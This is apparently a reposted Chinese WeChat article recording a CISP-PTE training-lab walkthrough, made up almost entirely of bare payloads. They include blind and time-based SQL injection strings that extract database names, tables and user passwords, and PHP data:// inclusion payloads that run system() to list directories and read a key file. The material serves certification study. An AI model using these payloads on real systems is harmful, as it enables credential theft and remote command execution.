body="CISP-PTE认证考试"
' or 1=1 or '' or 1=2 or '
' or sleep(5) or '
' or if((ascii (mid(database(), 1,1))=32),sleep(2),1) or '' or (if(ascii(mid((select table_name from information_schema.tables where table_schema like 0x32776562 limit 0,1),1,1))=1,1,sleep(2))) or '' or (if(ascii(mid((select column_name from information_schema.columns where table_schema like 0x32776562 and table_name like 0x61727469636C6531 limit 0,1),1,1))=1,sleep(2),1)) or '' or (if(ascii(mid((select group_concat(password) from (select * from users1 limit 0,1) as xlz),1,1))=1,sleep(2),1)) or '
用户1:xilizhu
xlz',(select database()),/*
xlz',(select group_concat(table_name) from information_schema.tables where table_schema='2web'),/*xlz',(select group_concat(column_name) from information_schema.columns where table_schema='2web' and table_name='users1'),/*
xlz',(select password from users1 limit 0,1),/*xlz',(select group_concat(password) from users1 where username='admin'),/*
?page=data:text/plain, phpinfo();
?page=data:text/plain,<?php system('ls ../') ?>?page=data:text/plain,<?php system('cat ../key.cisp') ?>
?str=s:8:"CISP-PTE";
利用本账号所发文章
进行直接或间接的非法行为
均由操作者本人负全责
犀利猪安全及文章对应作者
不为此承担任何责任
原文始发于微信公众号(犀利猪安全):CISP-PTE | 靶场通关记录(二)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论